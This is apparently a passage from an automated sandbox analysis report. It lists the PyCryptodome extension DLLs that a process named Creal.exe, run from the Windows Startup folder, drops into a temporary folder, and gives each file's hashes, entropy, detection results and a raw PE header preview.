                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17920
                                                                                                                                                                                                                                                      Entropy (8bit):5.671305741258107
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:APHoDUntQj0sKhDOJ+0QPSfu6rofDjiZzgE+kbwb:VUOYsKNO466DjoUE+
                                                                                                                                                                                                                                                      MD5:556E6D0E5F8E4DA74C2780481105D543
                                                                                                                                                                                                                                                      SHA1:7A49CDEF738E9FE9CD6CD62B0F74EAD1A1774A33
                                                                                                                                                                                                                                                      SHA-256:247B0885CF83375211861F37B6DD1376AED5131D621EE0137A60FE7910E40F8B
                                                                                                                                                                                                                                                      SHA-512:28FA0CE6BDBCC5E95B80AADC284C12658EF0C2BE63421AF5627776A55050EE0EA0345E30A15B744FC2B2F5B1B1BBB61E4881F27F6E3E863EBAAEED1073F4CDA1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." .....*..........P.....................................................`..........................................H......hI..d....p.......`..X...............(....A...............................A..8............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA224.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):21504
                                                                                                                                                                                                                                                      Entropy (8bit):5.878701941774916
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:EJWo4IRCGHX1KXqHGcvYHp5RYcARQOj4MSTjqgPmJD1OhgkxEv:EcIRnHX1P/YtswvaD1Rk
                                                                                                                                                                                                                                                      MD5:2F2655A7BBFE08D43013EDDA27E77904
                                                                                                                                                                                                                                                      SHA1:33D51B6C423E094BE3E34E5621E175329A0C0914
                                                                                                                                                                                                                                                      SHA-256:C734ABBD95EC120CB315C43021C0E1EB1BF2295AF9F1C24587334C3FCE4A5BE1
                                                                                                                                                                                                                                                      SHA-512:8AF99ACC969B0E560022F75A0CDCAA85D0BDEADADEACD59DD0C4500F94A5843EA0D4107789C1A613181B1F4E5252134A485EF6B1D9D83CDB5676C5FEE4D49B90
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA256.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):21504
                                                                                                                                                                                                                                                      Entropy (8bit):5.881781476285865
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:EJWo4IRCGHXfKXqHGcvYHp5RYcARQOj4MSTjqgPmJD12gkxEv:EcIRnHXfP/YtswvaD1zk
                                                                                                                                                                                                                                                      MD5:CDE035B8AB3D046B1CE37EEE7EE91FA0
                                                                                                                                                                                                                                                      SHA1:4298B62ED67C8D4F731D1B33E68D7DC9A58487FF
                                                                                                                                                                                                                                                      SHA-256:16BEA322D994A553B293A724B57293D57DA62BC7EAF41F287956B306C13FD972
                                                                                                                                                                                                                                                      SHA-512:C44FDEE5A210459CE4557351E56B2D357FD4937F8EC8EACEAB842FEE29761F66C2262FCBAAC837F39C859C67FA0E23D13E0F60B3AE59BE29EB9D8ABAB0A572BB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA384.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26624
                                                                                                                                                                                                                                                      Entropy (8bit):5.837887867708438
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:e839Cc4itui0gel9soFdkO66MlPGXmXcyYDTzks:Ns4u/FZ6nPxMLDvk
                                                                                                                                                                                                                                                      MD5:999D431197D7E06A30E0810F1F910B9A
                                                                                                                                                                                                                                                      SHA1:9BFF781221BCFFD8E55485A08627EC2A37363C96
                                                                                                                                                                                                                                                      SHA-256:AB242B9C9FB662C6F7CB57F7648F33983D6FA3BB0683C5D4329EC2CC51E8C875
                                                                                                                                                                                                                                                      SHA-512:A5DD92DD471ADB44EEFE5919EF9CA3978724E21174DF5B3A9C1F0AB462F928E5A46A460D02417DB7522F5DE3BFEED5EEE6B1EAFAF3E621722E85E72675F7096F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`..........................................k.......l..d...............................(...pd...............................d..8............`...............................text....F.......H.................. ..`.rdata.......`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA512.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26624
                                                                                                                                                                                                                                                      Entropy (8bit):5.895310340516013
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:lcX9Nf4ttui0gel9soFdkO66MlPGXmXc/vDTOvk:a38u/FZ6nPxM3DAk
                                                                                                                                                                                                                                                      MD5:0931ABBF3AED459B1A2138B551B1D3BB
                                                                                                                                                                                                                                                      SHA1:9EC0296DDAF574A89766A2EC035FC30073863AB0
                                                                                                                                                                                                                                                      SHA-256:1729A0DC6B80CB7A3C07372B98B10D3C6C613EA645240878E1FDE6A992FA06F1
                                                                                                                                                                                                                                                      SHA-512:9F970BB4D10B94F525DDDDE307C7DA5E672BBFB3A3866A34B89B56ADA99476724FD690A4396857182749294F67F36DB471A048789FB715D2A7DAF46917FC1947
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...T..f.........." .....H..."......P.....................................................`.........................................@l......(m..d...............................(....d...............................e..8............`...............................text...hG.......H.................. ..`.rdata..x....`.......L..............@..@.data................^..............@....pdata...............`..............@..@.rsrc................d..............@..@.reloc..(............f..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_clmul.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12800
                                                                                                                                                                                                                                                      Entropy (8bit):4.967737129255606
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:dMpWt/1nCuqaL0kt7TsEx2fiTgDZqGF0T7cqgkLgJ:k/k1Ts64DDJyBgkLg
                                                                                                                                                                                                                                                      MD5:5F057A380BACBA4EF59C0611549C0E02
                                                                                                                                                                                                                                                      SHA1:4B758D18372D71F0AA38075F073722A55B897F71
                                                                                                                                                                                                                                                      SHA-256:BCB14DAC6C87C24269D3E60C46B49EFFB1360F714C353318F5BBAA48C79EC290
                                                                                                                                                                                                                                                      SHA-512:E1C99E224745B86EE55822C1DBCB4555A11EC31B72D87B46514917EB61E0258A1C6D38C4F592969C17EB4F0F74DA04BCECA31CF1622720E95F0F20E9631792E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^J.6?$.6?$.6?$.?G..2?$.dJ%.4?$.}G%.5?$.6?%..?$.dJ!.<?$.dJ .>?$.dJ'.5?$..J,.7?$..J$.7?$..J..7?$..J&.7?$.Rich6?$.........................PE..d...V..f.........." ................P.....................................................`.........................................P8.......8..d....`.......P...............p..(....1...............................1..8............0...............................text............................... ..`.rdata..2....0......................@..@.data...H....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_portable.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):13312
                                                                                                                                                                                                                                                      Entropy (8bit):5.007867576025166
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:bMt/1nCuqaL0ktPH0T7fwtF4zDn2rGacqgRGd:1/kpU3Yv4zDXqgRGd
                                                                                                                                                                                                                                                      MD5:49BCA1B7DF076D1A550EE1B7ED3BD997
                                                                                                                                                                                                                                                      SHA1:47609C7102F5B1BCA16C6BAD4AE22CE0B8AEE9E9
                                                                                                                                                                                                                                                      SHA-256:49E15461DCB76690139E71E9359F7FCF92269DCCA78E3BFE9ACB90C6271080B2
                                                                                                                                                                                                                                                      SHA-512:8574D7FA133B72A4A8D1D7D9FDB61053BC88C2D238B7AC7D519BE19972B658C44EA1DE433885E3206927C75DD5D1028F74999E048AB73189585B87630F865466
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...V..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..(....p.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_keccak.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):15872
                                                                                                                                                                                                                                                      Entropy (8bit):5.226023387740053
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:rfRKTN+HLjRskTdf4WazSTkwjEvuY2bylHDiYIgovg:mcHfRl5pauoSjy5DiE
                                                                                                                                                                                                                                                      MD5:CB5CFDD4241060E99118DEEC6C931CCC
                                                                                                                                                                                                                                                      SHA1:1E7FED96CF26C9F4730A4621CA9D18CECE3E0BCE
                                                                                                                                                                                                                                                      SHA-256:A8F809B6A417AF99B75EEEEA3ECD16BDA153CBDA4FFAB6E35CE1E8C884D899C4
                                                                                                                                                                                                                                                      SHA-512:8A89E3563C14B81353D251F9F019D8CBF07CB98F78452B8522413C7478A0D77B9ABF2134E4438145D6363CDA39721D2BAE8AD13D1CDACCBB5026619D95F931CF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...U..f.........." ..... ... ......P.....................................................`..........................................9.......9..d....`.......P..X............p..(...p2...............................2..8............0...............................text............ .................. ..`.rdata..@....0.......$..............@..@.data........@.......4..............@....pdata..X....P.......6..............@..@.rsrc........`.......:..............@..@.reloc..(....p.......<..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_poly1305.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14848
                                                                                                                                                                                                                                                      Entropy (8bit):5.262055670423592
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:C/ZN2eq/b04PAHH41F6fnVS0sVn+5CA5Z1cD66WGcqgFjLg:vI4IHHaQfSVnCZyDImgFjLg
                                                                                                                                                                                                                                                      MD5:18D2D96980802189B23893820714DA90
                                                                                                                                                                                                                                                      SHA1:5DEE494D25EB79038CBC2803163E2EF69E68274C
                                                                                                                                                                                                                                                      SHA-256:C2FD98C677436260ACB9147766258CB99780A007114AED37C87893DF1CF1A717
                                                                                                                                                                                                                                                      SHA-512:0317B65D8F292332C5457A6B15A77548BE5B2705F34BB8F4415046E3E778580ABD17B233E6CC2755C991247E0E65B27B5634465646715657B246483817CACEB7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...V..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..|............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......."..............@..@.data........@.......0..............@....pdata..|....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Math\_modexp.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):36352
                                                                                                                                                                                                                                                      Entropy (8bit):5.913843738203007
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:dspbXtHQY4ubrttQza9CHnZXQsnecAlOF0qZLAXxQI3Sya6XPpMg3Yx8MnDcCPSq:7Y44UagH6cAFCLUSYpMg3YDzPo5kG9G
                                                                                                                                                                                                                                                      MD5:EF472BA63FD22922CA704B1E7B95A29E
                                                                                                                                                                                                                                                      SHA1:700B68E7EF95514D5E94D3C6B10884E1E187ACD8
                                                                                                                                                                                                                                                      SHA-256:66EEF4E6E0CEEEF2C23A758BFBEDAE7C16282FC93D0A56ACAFC40E871AC3F01C
                                                                                                                                                                                                                                                      SHA-512:DC2060531C4153C43ABF30843BCB5F8FA082345CA1BB57F9AC8695EDDB28FF9FDA8132B6B6C67260F779D95FCADCAE2811091BCA300AB1E041FAE6CC7B50ABD8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...^..f.........." .....`...0......`.....................................................`..........................................~..|...L...d...............<...............(....q...............................q..8............p..(............................text...X^.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....pdata..<...........................@..@.rsrc...............................@..@.reloc..(...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Protocol\_scrypt.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):12288
                                                                                                                                                                                                                                                      Entropy (8bit):4.735350805948923
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:rhsC3eqv6b0q3OQ3rHu5bc64OhD2I/p3cqgONLg:r/Hq3jHuY64OhDJJgONLg
                                                                                                                                                                                                                                                      MD5:3B1CE70B0193B02C437678F13A335932
                                                                                                                                                                                                                                                      SHA1:063BFD5A32441ED883409AAD17285CE405977D1F
                                                                                                                                                                                                                                                      SHA-256:EB2950B6A2185E87C5318B55132DFE5774A5A579259AB50A7935A7FB143EA7B1
                                                                                                                                                                                                                                                      SHA-512:0E02187F17DFCFD323F2F0E62FBFE35F326DCF9F119FC8B15066AFAEEE4EB7078184BC85D571B555E9E67A2DD909EC12D8A67E3D075E9B1283813EF274E05C0D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^:.6?T.6?T.6?T.?G..2?T.dJU.4?T.}GU.5?T.6?U..?T.dJQ.<?T.dJP.>?T.dJW.5?T..J\.7?T..JT.7?T..J..7?T..JV.7?T.Rich6?T.........................PE..d...Z..f.........." ................P.....................................................`..........................................8..d....8..d....`.......P..4............p..(....1...............................1..8............0...............................text...H........................... ..`.rdata..0....0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve25519.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):22528
                                                                                                                                                                                                                                                      Entropy (8bit):5.705606408072877
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:19BcRxBmau38CYIl9bhgIW0mvufueNr359/tjGGDEFSegqrA:NcRy38J+9dmvufFtaGDV
                                                                                                                                                                                                                                                      MD5:FF33C306434DEC51D39C7BF1663E25DA
                                                                                                                                                                                                                                                      SHA1:665FCF47501F1481534597C1EAC2A52886EF0526
                                                                                                                                                                                                                                                      SHA-256:D0E3B6A2D0E073B2D9F0FCDB051727007943A17A4CA966D75EBA37BECDBA6152
                                                                                                                                                                                                                                                      SHA-512:66A909DC9C3B7BD4050AA507CD89B0B3A661C85D33C881522EC9568744953B698722C1CBFF093F9CBCD6119BD527FECAB05A67F2E32EC479BE47AFFA4377362C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...\..f.........." .....6...$......P.....................................................`.........................................`Y......`Z..d............p..................(....R..............................0R..8............P...............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data........`.......J..............@....pdata.......p.......P..............@..@.rsrc................T..............@..@.reloc..(............V..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve448.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):70656
                                                                                                                                                                                                                                                      Entropy (8bit):6.0189903352673655
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Jfju4GgRMgWWnEDZiECgd/iwOXUQdbhov0Clb8Cx4hpK8ithLFIDullRPwDHxXOa:pXRMgWiEDZiECgd/iwOXUQdbhov0ClbU
                                                                                                                                                                                                                                                      MD5:F267BF4256F4105DAD0D3E59023011ED
                                                                                                                                                                                                                                                      SHA1:9BC6CA0F375CE49D5787C909D290C07302F58DA6
                                                                                                                                                                                                                                                      SHA-256:1DDE8BE64164FF96B2BAB88291042EB39197D118422BEE56EB2846E7A2D2F010
                                                                                                                                                                                                                                                      SHA-512:A335AF4DBF1658556ED5DC13EE741419446F7DAEC6BD2688B626A803FA5DD76463D6367C224E0B79B17193735E2C74BA417C26822DAEEF05AC3BAB1588E2DE83
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:..P~...~...~...w.3.x...,...|...5...}...~...U...,...u...,...v...,...}.......|............._.............Rich~...................PE..d...\..f.........." .........8......`........................................P............`.............................................0.......d....0....... ..$............@..(.......................................8............................................text...8........................... ..`.rdata..............................@..@.data...............................@....pdata..$.... ......................@..@.rsrc........0......................@..@.reloc..(....@......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ec_ws.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):770560
                                                                                                                                                                                                                                                      Entropy (8bit):7.613224993327352
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:XtIrHoxJ8gf1266y8IXhJvCKAmqVLzcrZgYIMGv1iLD9yQvG6h:XtIrHoxJFf1p34hcrn5Go9yQO6
                                                                                                                                                                                                                                                      MD5:1EFD7F7CB1C277416011DE6F09C355AF
                                                                                                                                                                                                                                                      SHA1:C0F97652AC2703C325AB9F20826A6F84C63532F2
                                                                                                                                                                                                                                                      SHA-256:AB45FA80A68DB1635D41DC1A4AAD980E6716DAC8C1778CB5F30CDB013B7DF6E6
                                                                                                                                                                                                                                                      SHA-512:2EC4B88A1957733043BBD63CEAA6F5643D446DB607B3267FAD1EC611E6B0AF697056598AAC2AE5D44AB2B9396811D183C32BCE5A0FF34E583193A417D1C5226B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........s.. .. .. ... .. ..!.. ..!.. .. .. ..!.. ..!.. ..!.. \..!.. \..!.. \.r .. \..!.. Rich.. ................PE..d...[..f.........." ................`.....................................................`.............................................h.......d...............................0......................................8...............(............................text............................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..0...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed25519.pyd

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):26112
                                                                                                                                                                                                                                                      Entropy (8bit):5.8551858881598795
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:BczadRwoF2MZ81n0XTyMCYIl9bhgIW0mv8aeadRcwRwftjGLD2pRQNgQQ77k:2udRf2MuMJ+9dmv8aea34taLDcfQ
                                                                                                                                                                                                                                                      MD5:C5FB377F736ED731B5578F57BB765F7A
                                                                                                                                                                                                                                                      SHA1:5BA51E11F4DE1CAEDEBA0F7D4D10EC62EC109E01
                                                                                                                                                                                                                                                      SHA-256:32073DF3D5C85ABCE7D370D6E341EF163A8350F6A9EDC775C39A23856CCFDD53
                                                                                                                                                                                                                                                      SHA-512:D361BCDAF2C700D5A4AC956D96E00961432C05A1B692FC870DB53A90F233A6D24AA0C3BE99E40BD8E5B7C6C1B2BCDCDCFC545292EF321486FFC71C5EA7203E6A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
